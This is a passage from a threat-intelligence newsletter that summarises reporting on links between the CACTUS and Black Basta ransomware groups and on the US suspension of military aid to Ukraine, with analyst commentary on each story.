Analyst Comments: The connection between CACTUS and Black Basta underscores how ransomware groups continuously adapt to law enforcement crackdowns, such as the disruption of QakBot. The shared use of the BC module suggests a high degree of operational familiarity between the two groups, reinforcing the notion that cybercriminals frequently migrate between ransomware-as-a-service (RaaS) operations. Organizations should remain vigilant, as these groups leverage sophisticated social engineering techniques, including vishing and IT support impersonation, to gain initial access. Strengthening endpoint security and implementing strict access controls remain crucial defenses against these evolving threats.
FROM THE MEDIA: Black Basta attackers have employed deceptive tactics, such as email bombing campaigns and impersonation of IT support staff, to trick victims into installing remote access tools like Quick Assist. Once access is obtained, the attackers sideload malicious DLLs using legitimate executables, ultimately deploying the BackConnect module. The CACTUS ransomware group has been observed using identical techniques, reinforcing suspicions that Black Basta affiliates have transitioned to CACTUS following QakBot’s disruption. Recent leaks from Black Basta’s internal chat logs reveal that its members share stolen credentials from information-stealer malware, indicating a continued reliance on compromised credentials for initial access.
READ THE STORY: THN
Items of interest
Zelenskyy Signals Readiness for Talks as US Aid Freeze Shakes Kyiv
Bottom Line Up Front (BLUF): Ukrainian President Volodymyr Zelenskyy is making diplomatic overtures to repair relations with President Donald Trump after a tense Oval Office meeting led to the suspension of US military aid. Facing mounting pressure, Zelenskyy expressed readiness for peace talks and sought to salvage a stalled US-Ukraine minerals deal. However, the sudden halt in arms deliveries has heightened concerns about Ukraine’s ability to defend against Russian missile strikes.
Analyst Comments: The suspension of U.S. military aid is a severe blow to Ukraine, which relies heavily on American support to counter Russian aggression. Trump’s demand for immediate ceasefire concessions aligns with his broader push for a quick resolution to the war, potentially at Ukraine’s expense. The minerals deal, which could provide Ukraine with crucial economic leverage, remains in limbo, underscoring the high stakes of the diplomatic fallout. If military assistance remains frozen, Ukraine may face increasing battlefield vulnerabilities, while European allies could be forced to step up their support.
FROM THE MEDIA: During a meeting at the White House last Friday, tensions flared between Trump and Zelenskyy over Ukraine’s reluctance to agree to an immediate ceasefire. Following the dispute, Trump suspended all U.S. military aid, a move that alarmed both Kyiv and European allies. Zelenskyy has since sought to repair relations, emphasizing Ukraine’s willingness to negotiate a lasting peace under Trump’s leadership. Meanwhile, a critical minerals deal intended to boost U.S.-Ukraine cooperation was derailed by the fallout. Andriy Yermak, Zelenskyy’s chief of staff, is leading efforts to salvage the agreement, engaging with Republican lawmakers. France has proposed a limited ceasefire covering missile and drone attacks on civilian infrastructure, but the plan has yet to gain broad support. Ukrainian officials warn that without U.S. assistance, Russia could intensify its missile strikes, posing significant risks to the country’s defense capabilities.
READ THE STORY: FT
Ukrainian President Zelensky ‘wants to make things right’ with US President Trump (Video)
FROM THE MEDIA: Ukraine's President Volodymyr Zelensky has said his explosive Oval Office meeting with Donald Trump on Friday was "regrettable", in his first public remarks since the US announced a pause in military aid to Kyiv.
Zelensky says he is ready to sign minerals deal (Video)
FROM THE MEDIA: The Ukrainian president, Volodymyr Zelenskyy, talking to reporters after a summit with European leaders in London, sought to move the conversation forward from his difficult meeting with Donald Trump and signalled Ukraine’s readiness to sign a minerals deal.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.